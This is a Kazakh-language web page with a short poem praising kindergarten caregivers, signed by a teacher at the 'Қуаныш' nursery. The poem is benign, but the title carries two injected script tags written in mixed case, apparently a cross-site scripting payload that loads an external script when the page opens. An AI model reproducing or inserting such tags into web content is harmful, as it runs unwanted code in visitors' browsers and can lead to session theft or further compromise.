Тәрбиеші<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.02.2021

Таң атқаннан тынбайды

Күлімсіреп, жымыйып

Жылап келген баланы

Жұбанбасқа қоймайды.

 

Жан-жақты етіп баланы

Білім беріп, үйретіп

Сөйлемесе сөйлетіп

Қадағалап бәрінде,

Жамандықтан қорғайды.

 

Жұдырықтай жүрегін

Ілтипатпен мейрімін

Бар өнерін, білімін

Тек балаға арнайды.

 

Бағып, қағып баланы

Сіңіртіп оймен сананы

Ата-анасын қуантып

Баласын кешке сыйлайды.

 

Тәрбиеші тәлімгер

Оған кімдер тең келер

Тәрбиеші алдынан

Өткен талай кемеңгер.

 

Тәрбиеші жұмысы

Оңай екен демеңдер

Сенбесеңдер сөзіме

Кешке дейін бақшада

Тәрбиеші болып көріңдер.

 

 

 

 «Қуаныш» бөбекжайы

 тәрбиешісі-  Ескендирова.Ә.Н

Просмотров: 307


Пікір қосу



Деректерді қолтаңбаға қосу